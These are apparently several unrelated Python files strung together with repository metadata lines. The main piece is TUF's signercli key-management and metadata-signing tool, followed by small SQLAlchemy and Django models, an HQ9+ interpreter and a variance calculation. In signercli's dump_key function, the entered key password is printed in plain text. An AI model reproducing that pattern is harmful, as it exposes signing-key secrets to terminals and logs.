$ python signercli.py --changepass ./keystore
<Options>
See the parse_options() function for the full list of supported options.
"""
import os
import optparse
import getpass
import sys
import logging
import tuf
import tuf.repo.signerlib
import tuf.repo.keystore
import tuf.util
import tuf.log
json = tuf.util.import_json()
# See 'log.py' to learn how logging is handled in TUF.
logger = logging.getLogger('tuf.signercli')
# The maximum number of attempts the user has to enter
# valid input.
MAX_INPUT_ATTEMPTS = 3
def _check_directory(directory):
try:
directory = tuf.repo.signerlib.check_directory(directory)
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
return directory
def _get_password(prompt='Password: ', confirm=False):
"""
Return the password entered by the user. If 'confirm'
is True, the user is asked to enter the previously
entered password once again. If they match, the
password is returned to the caller.
"""
while True:
password = getpass.getpass(prompt, sys.stderr)
if not confirm:
return password
password2 = getpass.getpass('Confirm: ', sys.stderr)
if password == password2:
return password
else:
print 'Mismatch; try again.'
def _prompt(message, result_type=str):
"""
Prompt the user for input by printing 'message', converting
the input to 'result_type', and returning the value to the
caller.
"""
return result_type(raw_input(message))
def _get_metadata_directory():
"""
Get the metadata directory from the user. The user
is asked to enter the directory, and if validated, is
returned to the caller. 'tuf.FormatError' is raised
if the directory is not properly formatted, and 'tuf.Error'
if it does not exist.
"""
metadata_directory = _prompt('\nEnter the metadata directory: ', str)
# Raises 'tuf.FormatError' or 'tuf.Error'.
metadata_directory = _check_directory(metadata_directory)
return metadata_directory
def _list_keyids(keystore_directory):
"""
List the key files found in 'keystore_directory'.
It is assumed the directory exists and has been validated by
the caller. The keyids are listed without the '.key' extension.
"""
# Extract the key files ending in a '.key' extension.
key_paths = []
for filename in os.listdir(keystore_directory):
full_path = os.path.join(keystore_directory, filename)
if filename.endswith('.key') and not os.path.isdir(full_path):
key_paths.append(filename)
# Print the keys without the '.key' extension.
print '\nListing the keyids in '+repr(keystore_directory)
for keyid in key_paths:
print keyid[0:keyid.rfind('.key')]
def _get_keyids(keystore_directory):
"""
Load the keyids in 'keystore_directory'. The keystore
database is populated with the keyids that are found
and successfully loaded. A list containing the keyids
of the loaded keys is returned to the caller. Since the
key files are stored in encrypted form, the user is asked
to enter the password that was used to encrypt the key
file.
"""
# The keyids list containing the keys loaded.
loaded_keyids = []
# Save the 'load_keystore_from_keyfiles' function call.
load_key = tuf.repo.keystore.load_keystore_from_keyfiles
# Ask the user for the keyid and password. Next, try to load specified
# keyid/password combination. If loaded, append the loaded key's keyid
# to 'loaded_keyids'. Loop the steps above or exit when the user enters
# 'quit'.
while True:
keyid_prompt = '\nEnter the keyid or "quit" when done: '
keyid = _prompt(keyid_prompt, str)
if keyid.lower() == 'quit':
break
# Get the password from the user so we can decrypt the key file.
password = _get_password('\nEnter the keyid\'s password: ')
# Try to load the keyfile with the keyid and password credentials.
loaded_keyid = load_key(keystore_directory, [keyid], [password])
# Was 'keyid' loaded?
if keyid not in loaded_keyid:
logger.error('Could not load keyid: '+keyid)
continue
# Append 'keyid' to the loaded list of keyids.
loaded_keyids.append(loaded_keyid[0])
return loaded_keyids
def _get_all_config_keyids(config_filepath, keystore_directory):
"""
Retrieve the contents of the config file and load
the keys for the top-level roles. After this function
returns successfully, all the required roles are loaded
in the keystore. The arguments should be absolute paths.
<Exceptions>
tuf.Error, if the required top-level keys could
not be loaded.
<Returns>
A dictionary containing the keyids for the top-level roles.
loaded_keyids = {'root': [1233d3d, 598djdks, ..],
'release': [sdfsd323, sdsd9090s, ..]
...}
"""
# Save the 'load_keystore_from_keyfiles' function call.
load_key = tuf.repo.keystore.load_keystore_from_keyfiles
# 'tuf.Error' raised if the configuration file cannot be read.
config_dict = tuf.repo.signerlib.read_config_file(config_filepath)
loaded_keyids = {}
# Extract the sections from the config file. We are only
# interested in role sections.
for key, value in config_dict.items():
if key in ['root', 'targets', 'release', 'timestamp']:
# Try to load the keyids for each role.
loaded_keyids[key] = []
for keyid in value['keyids']:
for attempt in range(MAX_INPUT_ATTEMPTS):
message = '\nEnter the password for the '+key+' role ('+keyid+'): '
password = _get_password(message)
loaded_key = load_key(keystore_directory, [keyid], [password])
if not loaded_key or keyid not in loaded_key:
logger.error('Could not load keyid: '+keyid)
continue
loaded_keyids[key].append(keyid)
break
if keyid not in loaded_keyids[key]:
raise tuf.Error('Could not load a required top-level role key')
# Ensure we loaded keys for the required top-level roles.
for key in ['root', 'targets', 'release', 'timestamp']:
if key not in loaded_keyids:
message = 'The configuration file did not contain the required roles'
raise tuf.Error(message)
return loaded_keyids
def _get_role_config_keyids(config_filepath, keystore_directory, role):
"""
Retrieve and load the key(s) for 'role', as listed in the keyids
found in 'config_filepath'. 'config_filepath' and 'keystore_directory'
should be absolute paths.
<Exceptions>
tuf.Error, if the required keys could not be loaded.
"""
# Save the 'load_keystore_from_keyfiles' function call.
load_key = tuf.repo.keystore.load_keystore_from_keyfiles
# 'tuf.Error' raised if the configuration file cannot be read.
config_dict = tuf.repo.signerlib.read_config_file(config_filepath)
role_keyids = []
# Extract the sections from the config file. We are only interested
# in the 'role' section.
for key, value in config_dict.items():
if key == role:
for keyid in value['keyids']:
for attempt in range(MAX_INPUT_ATTEMPTS):
message = '\nEnter the password for the '+key+' role ('+keyid+'): '
password = _get_password(message)
loaded_key = load_key(keystore_directory, [keyid], [password])
if not loaded_key or keyid not in loaded_key:
print 'Could not load keyid: '+keyid
logger.error('Could not load keyid: '+keyid)
continue
role_keyids.append(keyid)
break
# Ensure we loaded all the keyids.
for keyid in value['keyids']:
if keyid not in role_keyids:
raise tuf.Error('Could not load a required role key')
if not role_keyids:
raise tuf.Error('Could not load the required keys for '+role)
return role_keyids
def _sign_and_write_metadata(metadata, keyids, filename):
"""
Sign 'metadata' and write it to 'filename' (an absolute path),
overwriting the original file if it exists. If any of the
keyids have already signed the file, the old signatures of
those keyids will be replaced.
<Exceptions>
tuf.FormatError, if any of the arguments are incorrectly formatted.
tuf.Error, if an error is encountered.
"""
# Sign the metadata object. The 'signable' object contains the keyids
# used in the signing process, including the signatures generated.
signable = tuf.repo.signerlib.sign_metadata(metadata, keyids, filename)
# Write the 'signable' object to 'filename'. The 'filename' file is
# the final metadata file, such as 'root.txt' and 'targets.txt'.
tuf.repo.signerlib.write_metadata_file(signable, filename)
def change_password(keystore_directory):
"""
<Purpose>
Change the password for the signing key specified by the user.
All the values required by the user will be interactively
retrieved by this function.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The key file specified by the user is modified, including the encryption
key.
<Returns>
None.
"""
# Save the 'load_keystore_from_keyfiles' function call.
load_key = tuf.repo.keystore.load_keystore_from_keyfiles
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# List the keyids in the keystore and prompt the user for the keyid they
# wish to modify.
_list_keyids(keystore_directory)
# Retrieve the keyid from the user.
message = '\nEnter the keyid for the password you wish to change: '
keyid = _prompt(message, str)
# Get the old password from the user.
old_password_prompt = '\nEnter the old password for the keyid: '
old_password = _get_password(old_password_prompt)
# Try to load the keyfile
loaded_keys = load_key(keystore_directory, [keyid], [old_password])
# Was 'keyid' loaded?
if keyid not in loaded_keys:
message = 'Could not load keyid: '+keyid+'\n'
raise tuf.RepositoryError(message)
# Retrieve the new password.
new_password = _get_password('\nNew password: ', confirm=True)
# Now that we have all the required information, try to change the password.
try:
tuf.repo.keystore.change_password(keyid, old_password, new_password)
except (tuf.BadPasswordError, tuf.UnknownKeyError), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
# Save the changes.
tuf.repo.keystore.save_keystore_to_keyfiles(keystore_directory)
def generate_rsa_key(keystore_directory):
"""
<Purpose>
Generate an RSA key and save it to the keystore directory.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
An RSA key will be generated and added to tuf.repo.keystore.
The RSA key will be saved to the keystore directory specified
on the command-line.
<Returns>
None.
"""
# Save a reference to the generate_and_save_rsa_key() function.
save_rsa_key = tuf.repo.signerlib.generate_and_save_rsa_key
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# Retrieve the number of bits for the RSA key from the user.
rsa_key_bits = _prompt('\nEnter the number of bits for the RSA key: ', int)
# Retrieve the password used to encrypt/decrypt the key file from the user.
message = '\nEnter a password to encrypt the generated RSA key: '
password = _get_password(message, confirm=True)
# Generate the RSA key and save it to 'keystore_directory'.
try:
save_rsa_key(keystore_directory=keystore_directory,
password=password, bits=rsa_key_bits)
except (tuf.FormatError, tuf.CryptoError), e:
message = 'The RSA key could not be generated. '+str(e)+'\n'
raise tuf.RepositoryError(message)
def list_signing_keys(keystore_directory):
"""
<Purpose>
Print the key IDs of the signing keys listed in the keystore
directory.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
None.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
_list_keyids(keystore_directory)
def dump_key(keystore_directory):
"""
<Purpose>
Dump the contents of the signing key specified by the user.
This dumped information includes the keytype, signing method,
the public key, and the private key (if requested by the user).
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of encrypted key files are extracted and printed.
<Returns>
None.
"""
# Save the 'load_keystore_from_keyfiles' function call.
load_key = tuf.repo.keystore.load_keystore_from_keyfiles
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# List the keyids found in 'keystore_directory', minus the '.key' extension.
_list_keyids(keystore_directory)
# Retrieve the keyid and password from the user.
message = '\nEnter the keyid for the signing key you wish to dump: '
keyid = _prompt(message, str)
password = _get_password('\nEnter the password for the keyid: ')
print
print keyid
print password
# Try to load the keyfile
loaded_keys = load_key(keystore_directory, [keyid], [password])
# Was 'keyid' loaded?
if keyid not in loaded_keys:
message = 'Could not load keyid: '+keyid+'\n'
raise tuf.RepositoryError(message)
# Get the key object.
key = tuf.repo.keystore.get_key(keyid)
# Ask the user if they would like to print the private key as well.
show_private = False
prompt = 'Should the private key be printed as well?' \
' (if yes, enter \'private\'): '
print '\n*WARNING* Printing the private key reveals' \
' sensitive information *WARNING*'
input = _prompt(prompt, str)
if input.lower() == 'private':
show_private = True
# Retrieve the key metadata according to the keytype.
if key['keytype'] == 'rsa':
key_metadata = tuf.rsa_key.create_in_metadata_format(key['keyval'],
private=show_private)
else:
message = 'The keystore contains an invalid key type.'
raise tuf.RepositoryError(message)
# Print the contents of the key metadata.
print json.dumps(key_metadata, indent=2, sort_keys=True)
def make_root_metadata(keystore_directory):
"""
<Purpose>
Create the 'root.txt' file.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of an existing root metadata file is overwritten.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# Get the metadata directory and the metadata filenames.
try:
metadata_directory = _get_metadata_directory()
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
filenames = tuf.repo.signerlib.get_metadata_filenames(metadata_directory)
# Get the configuration file.
config_filepath = _prompt('\nEnter the configuration file path: ', str)
config_filepath = os.path.abspath(config_filepath)
# Load the keys for the top-level roles.
try:
loaded_keyids = _get_all_config_keyids(config_filepath, keystore_directory)
except (tuf.Error, tuf.FormatError), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
root_keyids = loaded_keyids['root']
# Generate the root metadata and write it to 'root.txt'.
try:
tuf.repo.signerlib.build_root_file(config_filepath, root_keyids,
metadata_directory)
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
def make_targets_metadata(keystore_directory):
"""
<Purpose>
Create the 'targets.txt' metadata file. The targets must exist at the
same path they should on the repository. This takes a list of targets.
We're not worrying about custom metadata at the moment. It's allowed to
not provide keys.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of an existing targets metadata file is overwritten.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# Retrieve the target files.
prompt_targets = '\nEnter the directory containing the target files: '
target_directory = _prompt(prompt_targets, str)
# Verify 'target_directory'.
target_directory = _check_directory(target_directory)
# Retrieve the metadata directory and the 'targets' filename.
try:
metadata_directory = _get_metadata_directory()
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
# Get the configuration file.
config_filepath = _prompt('\nEnter the configuration file path: ', str)
config_filepath = os.path.abspath(config_filepath)
try:
# Retrieve and load the 'targets' signing keys.
targets_keyids = _get_role_config_keyids(config_filepath,
keystore_directory, 'targets')
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
try:
# Create, sign, and write the "targets.txt" file.
tuf.repo.signerlib.build_targets_file(target_directory, targets_keyids,
metadata_directory)
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
def make_release_metadata(keystore_directory):
"""
<Purpose>
Create the release metadata file.
The minimum metadata must exist. This is root.txt and targets.txt.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of an existing release metadata file is overwritten.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# Retrieve the metadata directory and the release filename.
try:
metadata_directory = _get_metadata_directory()
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
filenames = tuf.repo.signerlib.get_metadata_filenames(metadata_directory)
release_filename = filenames['release']
# Get the configuration file.
config_filepath = _prompt('\nEnter the configuration file path: ', str)
config_filepath = os.path.abspath(config_filepath)
# Retrieve and load the 'release' signing keys.
try:
release_keyids = _get_role_config_keyids(config_filepath,
keystore_directory, 'release')
# Generate the root metadata and write it to 'release.txt'
tuf.repo.signerlib.build_release_file(release_keyids, metadata_directory)
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
def make_timestamp_metadata(keystore_directory):
"""
<Purpose>
Create the timestamp metadata file. The 'release.txt' file must exist.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of an existing timestamp metadata file is overwritten.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# Retrieve the metadata directory and the timestamp filename.
try:
metadata_directory = _get_metadata_directory()
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
filenames = tuf.repo.signerlib.get_metadata_filenames(metadata_directory)
timestamp_filename = filenames['timestamp']
# Get the configuration file.
config_filepath = _prompt('\nEnter the configuration file path: ', str)
config_filepath = os.path.abspath(config_filepath)
# Retrieve and load the 'timestamp' signing keys.
try:
timestamp_keyids = _get_role_config_keyids(config_filepath,
keystore_directory, 'timestamp')
# Generate the root metadata and write it to 'timestamp.txt'
tuf.repo.signerlib.build_timestamp_file(timestamp_keyids,
metadata_directory)
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
def sign_metadata_file(keystore_directory):
"""
<Purpose>
Sign the metadata file specified by the user.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The contents of an existing metadata file is overwritten.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# List the keyids available in the keystore.
_list_keyids(keystore_directory)
# Retrieve the keyids of the signing keys from the user.
print '\nThe keyids that will sign the metadata file must be loaded.'
loaded_keyids = _get_keyids(keystore_directory)
if len(loaded_keyids) == 0:
message = 'No keyids were loaded\n'
raise tuf.RepositoryError(message)
# Retrieve the metadata file the user intends to sign.
metadata_filename = _prompt('\nEnter the metadata filename: ', str)
metadata_filename = os.path.abspath(metadata_filename)
if not os.path.isfile(metadata_filename):
message = repr(metadata_filename)+' is an invalid file.\n'
raise tuf.RepositoryError(message)
# Create, sign, and write the metadata file.
metadata = tuf.repo.signerlib.read_metadata_file(metadata_filename)
_sign_and_write_metadata(metadata, loaded_keyids, metadata_filename)
def make_delegation(keystore_directory):
"""
<Purpose>
Create a delegation by updating the 'delegations' field of 'targets.txt'
and creating the delegated role's metadata file. The user specifies the
delegated role's name and target files. The 'targets.txt' file must exist.
<Arguments>
keystore_directory:
The directory containing the signing keys (i.e., key files ending
in '.key').
<Exceptions>
tuf.RepositoryError, if an an error occurred while updating the repository.
<Side Effects>
The targets metadata file is modified. The 'delegations' field of
'targets.txt' is added.
<Returns>
None.
"""
# Verify the 'keystore_directory' argument.
keystore_directory = _check_directory(keystore_directory)
# Get the metadata directory.
try:
metadata_directory = _get_metadata_directory()
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
# Get the delegated role's target directory, which should be located within
# the repository's targets directory. We need this directory to generate the
# delegated role's target paths.
prompt = '\nNOTE: The directory entered below should be located within the '+\
'repository\'s targets directory.\nEnter the directory containing the '+\
'delegated role\'s target files: '
delegated_targets_directory = _prompt(prompt, str)
# Verify 'delegated_targets_directory'.
try:
tuf.repo.signerlib.check_directory(delegated_targets_directory)
except (tuf.FormatError, tuf.Error), e:
message = str(e)+'\n'
raise tuf.RepositoryError(message)
# Get all the target roles and their respective keyids.
# These keyids will let the user know which roles are currently known.
# signerlib.get_target_keyids() returns a dictionary that looks something
# like this: {'targets':[keyid1, ...], 'targets/role1':[keyid], ...}
targets_roles = tuf.repo.signerlib.get_target_keyids(metadata_directory)
# Get the parent role. We need to modify the parent role's metadata file.
print '\nListing "targets" and all available delegated roles.'
for section in targets_roles.keys():
print section
parent_role = None
# Retrieve the parent role from the user.
for attempt in range(MAX_INPUT_ATTEMPTS):
prompt = '\nChoose and enter the parent role\'s full name: '
parent_role = _prompt(prompt, str)
if parent_role not in targets_roles:
print '\nInvalid role name entered'
parent_role = None
continue
else:
break
# Ensure we loaded a valid parent role.
if parent_role is None:
message = 'Could not get a valid parent role.\n'
raise tuf.RepositoryError(message)
# 'load_key' is a reference to the 'load_keystore_from_keyfiles function'.
load_key = tuf.repo.keystore.load_keystore_from_keyfiles
# Load the parent's key(s). The key needs to be loaded because
# its metadata file will be modified.
parent_keyids = []
for keyid in targets_roles[parent_role]:
for attempt in range(MAX_INPUT_ATTEMPTS):
prompt = 'Enter the password for '+parent_role+' ('+keyid+'): '
password = _get_password(prompt)
loaded_keyid = load_key(keystore_directory, [keyid], [password])
if keyid not in loaded_keyid:
print '\nThe keyid could not be loaded.'
continue
parent_keyids.append(loaded_keyid[0])
break
if keyid not in parent_keyids:
message = 'Could not load the keys for the parent role.\n'
raise tuf.RepositoryError(message)
# Retrieve the delegated rolename from the user (e.g., 'role1').
delegated_role = _prompt('\nEnter the delegated role\'s name: ', str)
# List the keyids available in the keystore. The user will next
# identify the keyid for the new delegated role.
_list_keyids(keystore_directory)
# Retrieve the delegated role\'s keyid from the user.
print '\nThe keyid of the delegated role must be loaded.'
delegated_keyid = _get_keyids(keystore_directory)
# Ensure we actually loaded one delegated key. Delegated roles
# should have only one signing key.
if len(delegated_keyid) != 1:
message = 'Only one key must be loaded for the delegated role\n'
raise tuf.RepositoryError(message)
delegated_keyid = delegated_keyid[0]
# Retrieve the file paths for the delegated targets.
delegated_paths = []
for filename in os.listdir(delegated_targets_directory):
full_path = os.path.join(delegated_targets_directory, filename)
if os.path.isfile(full_path):
# The target paths need to be relative to the repository's targets
# directory (e.g., 'targets/role1/target_file.txt').
# [len(repository_directory)+1:] strips the repository path, including
# its trailing path separator.
repository_directory, junk = os.path.split(metadata_directory)
delegated_path = delegated_targets_directory[len(repository_directory)+1:]
target_path = os.path.join(delegated_path, filename)
delegated_paths.append(target_path)
message = 'The target paths for '+repr(delegated_role)+': '+repr(delegated_paths)
logger.info(message)
# Create, sign, and write the delegated role's metadata file.
parent_directory = os.path.join(metadata_directory, parent_role)
try:
os.mkdir(parent_directory)
except OSError, e:
pass
delegated_role_filename = delegated_role+'.txt'
metadata_filename = os.path.join(parent_directory, delegated_role_filename)
repository_directory, junk = os.path.split(metadata_directory)
delegated_metadata = tuf.repo.signerlib.generate_targets_metadata(repository_directory,
delegated_paths)
_sign_and_write_metadata(delegated_metadata, [delegated_keyid], metadata_filename)
# Retrieve the key from the keystore.
role_key = tuf.repo.keystore.get_key(delegated_keyid)
# Extract the metadata from the parent role's file.
parent_filename = os.path.join(metadata_directory, parent_role)
parent_filename = parent_filename+'.txt'
parent_signable = tuf.repo.signerlib.read_metadata_file(parent_filename)
parent_metadata = parent_signable['signed']
# Extract the delegations structure if it exists.
delegations = parent_metadata.get('delegations', {})
# Update the keys field.
keys = delegations.get('keys', {})
if role_key['keytype'] == 'rsa':
keys[delegated_keyid] = tuf.rsa_key.create_in_metadata_format(role_key['keyval'])
else:
message = 'Invalid keytype encountered: '+delegated_keyid+'\n'
raise tuf.RepositoryError(message)
delegations['keys'] = keys
# Update the 'roles' field.
roles = delegations.get('roles', {})
threshold = 1
delegated_role = parent_role+'/'+delegated_role
relative_paths = []
for path in delegated_paths:
relative_paths.append(os.path.sep.join(path.split(os.path.sep)[1:]))
roles[delegated_role] = tuf.formats.make_role_metadata([delegated_keyid],
threshold,
relative_paths)
delegations['roles'] = roles
# Update the larger metadata structure.
parent_metadata['delegations'] = delegations
# Try to write the modified 'targets.txt' file.
parent_signable = tuf.formats.make_signable(parent_metadata)
_sign_and_write_metadata(parent_signable, parent_keyids, parent_filename)
def process_option(options):
"""
<Purpose>
Determine the command-line option chosen by the user and call its
corresponding function. If 'signercli' is invoked with the --genrsakey
command-line option, its corresponding 'generate_rsa_key()' function
is called.
<Arguments>
options:
An optparse OptionValues instance, returned by parser.parse_args().
<Exceptions>
tuf.RepositoryError, raised by one of the supported option
functions.
tuf.Error, if a valid option was not encountered.
<Side Effects>
Files in the repository are either created or modified
depending on the command-line option chosen by the user.
<Returns>
None.
"""
# Determine which option was chosen and call its corresponding
# internal function with the option's keystore directory argument.
if options.genrsakey is not None:
generate_rsa_key(options.genrsakey)
elif options.listkeys is not None:
list_signing_keys(options.listkeys)
elif options.changepass is not None:
change_password(options.changepass)
elif options.dumpkey is not None:
dump_key(options.dumpkey)
elif options.makeroot is not None:
make_root_metadata(options.makeroot)
elif options.maketargets is not None:
make_targets_metadata(options.maketargets)
elif options.makerelease is not None:
make_release_metadata(options.makerelease)
elif options.maketimestamp is not None:
make_timestamp_metadata(options.maketimestamp)
elif options.sign is not None:
sign_metadata_file(options.sign)
elif options.makedelegation is not None:
make_delegation(options.makedelegation)
else:
raise tuf.Error('A valid option was not encountered.\n')
def parse_options():
"""
<Purpose>
Parse the command-line options. 'signercli' expects a single
command-line option and one keystore directory argument.
Example:
signercli --genrsakey ./keystore
All supported command-line options expect a single keystore
directory argument. If 'signercli' is invoked with an incorrect
number of command-line options or arguments, a parser error
is printed and the script exits.
<Arguments>
None.
<Exceptions>
None.
<Side Effects>
A file is a created or modified depending on the option
encountered on the command-line.
<Returns>
The options object returned by the parser's parse_args() method.
"""
usage = 'usage: %prog [option] <keystore_directory>'
option_parser = optparse.OptionParser(usage=usage)
# Add the options supported by 'signercli' to the option parser.
option_parser.add_option('--genrsakey', action='store', type='string',
help='Generate an RSA key and save it to '
'the keystore.')
option_parser.add_option('--listkeys', action='store', type='string',
help='List the key IDs of the signing '
'keys located in the keystore.')
option_parser.add_option('--changepass', action='store', type='string',
help='Change the password for one of '
'the signing keys.')
option_parser.add_option('--dumpkey', action='store', type='string',
help='Dump the contents of an encrypted '
'key file.')
option_parser.add_option('--makeroot', action='store', type='string',
help='Create the Root metadata file '
'(root.txt).')
option_parser.add_option('--maketargets', action='store', type='string',
help='Create the Targets metadata file '
'(targets.txt).')
option_parser.add_option('--makerelease', action='store', type='string',
help='Create the Release metadata file '
'(release.txt).')
option_parser.add_option('--maketimestamp', action='store', type='string',
help='Create the Timestamp metadata file '
'(timestamp.txt).')
option_parser.add_option('--sign', action='store', type='string',
help='Sign a metadata file.')
option_parser.add_option('--makedelegation', action='store', type='string',
help='Create a delegated role by creating '
'its metadata file and updating the parent '
'role\'s metadata file.')
(options, remaining_arguments) = option_parser.parse_args()
# Ensure the script was invoked with the correct number of arguments
# (i.e., one command-line option and a single keystore directory argument.
# Return the options object to the caller to determine the option chosen
# by the user. option_parser.error() will print the argument error message
# and exit.
if len(sys.argv) != 3:
option_parser.error('Expected a single option and one keystore argument.')
return options
if __name__ == '__main__':
options = parse_options()
# Process the command-line option chosen by the user.
# 'tuf.RepositoryError' raised by the option's corresponding
# function if an error occurred. 'tuf.Error' raised if a valid
# option was not provided by the user.
try:
process_option(options)
except (tuf.RepositoryError, tuf.Error), e:
sys.stderr.write('Error: '+str(e))
sys.exit(1)
# The command-line option was processed successfully.
sys.exit(0)
__author__ = 'tombnorwood'
from .parabolicpathinputrecord import *
from .volcurve import *
from .volcurveinput import *
from .skewinput import *
from .volcurveinputrecord import *
UTF-8
Python
false
false
2,014
3,384,434,250,929
d3dfe6dfc09257e3a112223abbc7d63e9d2c57c4
832d2d4e037907418dba66b4b446eab3c5a7fb68
/core/db/company.py
3f11ad6366adbef33e0d26dea61776b786610c96
[]
no_license
cloudfishin/99scraper
https://github.com/cloudfishin/99scraper
e6dade920777cfd8cc86ac46fa9c12d6ab6d9cc5
f2628143219d6be9c6e94389d7cc6a6765cd796e
refs/heads/master
2021-01-24T06:12:49.838253
2014-04-17T00:03:08
2014-04-17T00:04:38
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from sqlalchemy.orm import relationship
__author__ = 'jesuejunior'
from sqlalchemy import Integer, Column, String, Float
import core
class Company(core.db.Model):
__tablename__ = 'company'
id = Column(Integer, primary_key=True)
title = Column(String, nullable=False, unique=True)
rank = Column(Float, nullable=False)
vacancy = Column(Integer, nullable=False)
follows = Column(Integer, nullable=False)
mission = Column(String, nullable=False)
about = Column(String, nullable=False)
path = Column(String)
thumb = Column(String)
# stats = relationship("Stats", uselist=False, backref="profile")
"""
A simple implementation of the HQ9+ programming language.
http://esolangs.org/wiki/HQ9%2B
Ignores everything except the four valid commands(case insensitive):
H Prints "Hello, world!"
Q Prints the entire text of the source code file.
9 Prints the complete canonical lyrics to "99 Bottles of Beer on the Wall"
+ Increments the accumulator.
"""
import sys
import re
import bottles
class HQ9PlusProgram(object):
def __init__(self, src):
self.src = src
self.acc = 0
self.commands = {
'H': self.hello,
'Q': self.quine,
'9': self.nine,
'+': self.plus,
}
def hello(self):
print 'Hello, world!'
def quine(self):
print self.src
def nine(self):
print '\n'.join(bottles.verses())
def plus(self):
self.acc += 1
def run(self):
for letter in re.findall(r'[HQ+9]', self.src.upper(), re.MULTILINE):
self.commands[letter]()
def main():
try:
filename = sys.argv[1]
except IndexError:
in_file = sys.stdin
else:
in_file = open(filename)
with in_file:
program = HQ9PlusProgram(in_file.read())
program.run()
main()
UTF-8
Python
false
false
2,014
5,291,399,727,627
3f3349b4c9118c83b545d669b4096d23ebea6e70
6e97f24d3dfbc1f65a691bfa098d2e4a583e51ee
/20130911_econometrics1.py
a8a815bbf8471db7fd25fbf8cfc3adfd7c15ec4c
[]
no_license
mchoimis/Python-Practice
https://github.com/mchoimis/Python-Practice
e800a6859de496dfef2a00da5a98e1d0fc512ad4
ec5a48032768a8ce4be7a4c6a269ba1f26e02b3f
refs/heads/master
2021-01-20T00:23:36.940700
2014-06-05T01:27:05
2014-06-05T01:27:05
12,071,659
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
import math
import decimal
w=0.75
mu=w*0.08+(1-w)*0.05
Var=pow(w, 2)*pow(0.07, 2) + pow((1-w), 2)*pow(0.04, 2) + 2*w*(1-w)*0.07*0.04*0.25
print w
print Var
print mu
print math.sqrt(Var)
UTF-8
Python
false
false
2,014
17,970,143,168,909
b1ce74a045e436c60068f417602f07f926ce767a
e4a1e93106ce03f7e820b2097f406212f828df6f
/FlickrPython/models.py
1df4d79a01fc29857fe5504dd021488b00767a7c
[]
no_license
gerahe/FlickrPython
https://github.com/gerahe/FlickrPython
58151b7204c5ba3fea70b97af3cec5a5cf3e8b1f
8bdfc0af7d0aa537155911b78d2674e2a6ec8bf4
refs/heads/master
2016-08-06T13:14:13.741589
2014-10-17T16:08:26
2014-10-17T16:08:26
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# Feel free to rename the models, but don't rename db_table values or field names.
#
# Also note: You'll have to insert the output of 'django-admin.py sqlcustom [appname]'
# into your database.
from django.db import models
class UserTasks(models.Model):
username = models.CharField(max_length=30, unique=True)
task1_complete = models.BooleanField()
task2_complete = models.BooleanField()
task1_score = models.IntegerField()
task1_count = models.IntegerField()
average_tags = models.IntegerField()
task2_score = models.IntegerField()
temp2_score = models.IntegerField()
task2_count = models.IntegerField()
photos_used = models.CommaSeparatedIntegerField(max_length=100)
class Meta:
db_table = u'user_tasks'
class PhotoList(models.Model):
